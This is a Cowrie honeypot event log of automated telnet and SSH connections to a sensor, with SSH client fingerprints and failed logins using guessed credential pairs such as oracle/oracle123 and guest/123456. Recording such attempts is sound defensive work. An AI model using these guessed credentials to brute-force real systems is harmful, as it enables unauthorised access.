{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59323,"dst_ip":"1.2.3.4","dst_port":23,"session":"671fe8fe9545","protocol":"telnet","message":"New connection: 212.227.125.160:59323 (1.2.3.4:23) [session: 671fe8fe9545]","sensor":"my-vps","timestamp":"2025-08-28T07:21:11.860755Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:21:11.863594Z","src_ip":"212.227.125.160","session":"21e6768e383e"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-28T07:21:12.529509Z","src_ip":"212.227.125.160","session":"21e6768e383e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:13.749743Z","src_ip":"212.227.125.160","session":"21e6768e383e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56872,"dst_ip":"1.2.3.4","dst_port":22,"session":"e343852aef3b","protocol":"ssh","message":"New connection: 212.227.235.229:56872 (1.2.3.4:22) [session: e343852aef3b]","sensor":"my-vps","timestamp":"2025-08-28T07:21:18.171469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:21:18.172244Z","src_ip":"212.227.235.229","session":"e343852aef3b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:21:18.421581Z","src_ip":"212.227.235.229","session":"e343852aef3b"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-28T07:21:19.171794Z","src_ip":"212.227.235.229","session":"e343852aef3b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:20.422953Z","src_ip":"212.227.235.229","session":"e343852aef3b"}
{"eventid":"cowrie.session.closed","duration":14.013657331466675,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:20.657251Z","src_ip":"212.227.125.160","session":"616e373be916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59425,"dst_ip":"1.2.3.4","dst_port":23,"session":"11c109255af6","protocol":"telnet","message":"New connection: 212.227.125.160:59425 (1.2.3.4:23) [session: 11c109255af6]","sensor":"my-vps","timestamp":"2025-08-28T07:21:20.847865Z"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":36770,"dst_ip":"1.2.3.4","dst_port":23,"session":"f488cb877472","protocol":"telnet","message":"New connection: 8.222.212.69:36770 (1.2.3.4:23) [session: f488cb877472]","sensor":"my-vps","timestamp":"2025-08-28T07:21:23.877040Z"}
{"eventid":"cowrie.session.closed","duration":13.745015859603882,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:25.605702Z","src_ip":"212.227.125.160","session":"671fe8fe9545"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59556,"dst_ip":"1.2.3.4","dst_port":23,"session":"a56ffe201ae1","protocol":"telnet","message":"New connection: 212.227.125.160:59556 (1.2.3.4:23) [session: a56ffe201ae1]","sensor":"my-vps","timestamp":"2025-08-28T07:21:25.796454Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37606,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a402807023e","protocol":"ssh","message":"New connection: 212.227.125.160:37606 (1.2.3.4:22) [session: 8a402807023e]","sensor":"my-vps","timestamp":"2025-08-28T07:21:27.896378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:21:27.898146Z","src_ip":"212.227.125.160","session":"8a402807023e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:21:28.121666Z","src_ip":"212.227.125.160","session":"8a402807023e"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:21:28.994334Z","src_ip":"212.227.125.160","session":"8a402807023e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:30.217556Z","src_ip":"212.227.125.160","session":"8a402807023e"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":36784,"dst_ip":"1.2.3.4","dst_port":23,"session":"d85331a19637","protocol":"telnet","message":"New connection: 8.222.212.69:36784 (1.2.3.4:23) [session: d85331a19637]","sensor":"my-vps","timestamp":"2025-08-28T07:21:32.181712Z"}
{"eventid":"cowrie.session.closed","duration":13.43345594406128,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:34.281242Z","src_ip":"212.227.125.160","session":"11c109255af6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56328,"dst_ip":"1.2.3.4","dst_port":22,"session":"2faa1c1838d3","protocol":"ssh","message":"New connection: 212.227.235.229:56328 (1.2.3.4:22) [session: 2faa1c1838d3]","sensor":"my-vps","timestamp":"2025-08-28T07:21:34.488415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:21:34.489260Z","src_ip":"212.227.235.229","session":"2faa1c1838d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59713,"dst_ip":"1.2.3.4","dst_port":23,"session":"3c4c3b0536af","protocol":"telnet","message":"New connection: 212.227.125.160:59713 (1.2.3.4:23) [session: 3c4c3b0536af]","sensor":"my-vps","timestamp":"2025-08-28T07:21:34.503928Z"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":45334,"dst_ip":"1.2.3.4","dst_port":23,"session":"496340e9b79c","protocol":"telnet","message":"New connection: 8.222.212.69:45334 (1.2.3.4:23) [session: 496340e9b79c]","sensor":"my-vps","timestamp":"2025-08-28T07:21:34.717464Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:21:34.742642Z","src_ip":"212.227.235.229","session":"2faa1c1838d3"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:21:35.504922Z","src_ip":"212.227.235.229","session":"2faa1c1838d3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:36.762000Z","src_ip":"212.227.235.229","session":"2faa1c1838d3"}
{"eventid":"cowrie.session.closed","duration":13.484657049179077,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:39.281050Z","src_ip":"212.227.125.160","session":"a56ffe201ae1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59760,"dst_ip":"1.2.3.4","dst_port":23,"session":"b9fe944f1220","protocol":"telnet","message":"New connection: 212.227.125.160:59760 (1.2.3.4:23) [session: b9fe944f1220]","sensor":"my-vps","timestamp":"2025-08-28T07:21:39.525125Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45702,"dst_ip":"1.2.3.4","dst_port":22,"session":"97b899bb833a","protocol":"ssh","message":"New connection: 212.227.125.160:45702 (1.2.3.4:22) [session: 97b899bb833a]","sensor":"my-vps","timestamp":"2025-08-28T07:21:44.242702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:21:44.243335Z","src_ip":"212.227.125.160","session":"97b899bb833a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:21:44.469933Z","src_ip":"212.227.125.160","session":"97b899bb833a"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:21:45.150486Z","src_ip":"212.227.125.160","session":"97b899bb833a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:46.378905Z","src_ip":"212.227.125.160","session":"97b899bb833a"}
{"eventid":"cowrie.session.closed","duration":13.014251232147217,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:47.518124Z","src_ip":"212.227.125.160","session":"3c4c3b0536af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59945,"dst_ip":"1.2.3.4","dst_port":23,"session":"a139fc9bfcf8","protocol":"telnet","message":"New connection: 212.227.125.160:59945 (1.2.3.4:23) [session: a139fc9bfcf8]","sensor":"my-vps","timestamp":"2025-08-28T07:21:47.713994Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40914,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d68fc473681","protocol":"ssh","message":"New connection: 212.227.235.229:40914 (1.2.3.4:22) [session: 9d68fc473681]","sensor":"my-vps","timestamp":"2025-08-28T07:21:50.532635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:21:50.534108Z","src_ip":"212.227.235.229","session":"9d68fc473681"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:21:50.783156Z","src_ip":"212.227.235.229","session":"9d68fc473681"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:21:51.531325Z","src_ip":"212.227.235.229","session":"9d68fc473681"}
{"eventid":"cowrie.session.closed","duration":13.209957361221313,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:52.735011Z","src_ip":"212.227.125.160","session":"b9fe944f1220"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:52.781839Z","src_ip":"212.227.235.229","session":"9d68fc473681"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59974,"dst_ip":"1.2.3.4","dst_port":23,"session":"857f7746650f","protocol":"telnet","message":"New connection: 212.227.125.160:59974 (1.2.3.4:23) [session: 857f7746650f]","sensor":"my-vps","timestamp":"2025-08-28T07:21:52.955329Z"}
{"eventid":"cowrie.session.closed","duration":31.041788339614868,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:54.918760Z","src_ip":"8.222.212.69","session":"f488cb877472"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51212,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4546b5e683a","protocol":"ssh","message":"New connection: 212.227.125.160:51212 (1.2.3.4:22) [session: f4546b5e683a]","sensor":"my-vps","timestamp":"2025-08-28T07:22:00.155137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:22:00.155960Z","src_ip":"212.227.125.160","session":"f4546b5e683a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:22:00.385887Z","src_ip":"212.227.125.160","session":"f4546b5e683a"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-28T07:22:01.042696Z","src_ip":"212.227.125.160","session":"f4546b5e683a"}
{"eventid":"cowrie.session.closed","duration":13.726276397705078,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:01.440194Z","src_ip":"212.227.125.160","session":"a139fc9bfcf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60157,"dst_ip":"1.2.3.4","dst_port":23,"session":"d52e67f899d1","protocol":"telnet","message":"New connection: 212.227.125.160:60157 (1.2.3.4:23) [session: d52e67f899d1]","sensor":"my-vps","timestamp":"2025-08-28T07:22:01.675939Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:02.263100Z","src_ip":"212.227.125.160","session":"f4546b5e683a"}
{"eventid":"cowrie.session.closed","duration":31.70642900466919,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:03.888068Z","src_ip":"8.222.212.69","session":"d85331a19637"}
{"eventid":"cowrie.session.closed","duration":13.633614540100098,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:06.588878Z","src_ip":"212.227.125.160","session":"857f7746650f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60217,"dst_ip":"1.2.3.4","dst_port":23,"session":"ddceb41b5f1c","protocol":"telnet","message":"New connection: 212.227.125.160:60217 (1.2.3.4:23) [session: ddceb41b5f1c]","sensor":"my-vps","timestamp":"2025-08-28T07:22:06.772760Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52480,"dst_ip":"1.2.3.4","dst_port":22,"session":"32ca347b749d","protocol":"ssh","message":"New connection: 212.227.235.229:52480 (1.2.3.4:22) [session: 32ca347b749d]","sensor":"my-vps","timestamp":"2025-08-28T07:22:06.936398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:22:06.937403Z","src_ip":"212.227.235.229","session":"32ca347b749d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:22:07.194322Z","src_ip":"212.227.235.229","session":"32ca347b749d"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-28T07:22:07.968981Z","src_ip":"212.227.235.229","session":"32ca347b749d"}
{"eventid":"cowrie.session.closed","duration":33.733033657073975,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:08.450433Z","src_ip":"8.222.212.69","session":"496340e9b79c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:09.227639Z","src_ip":"212.227.235.229","session":"32ca347b749d"}
{"eventid":"cowrie.session.closed","duration":13.729349613189697,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:15.405218Z","src_ip":"212.227.125.160","session":"d52e67f899d1"}
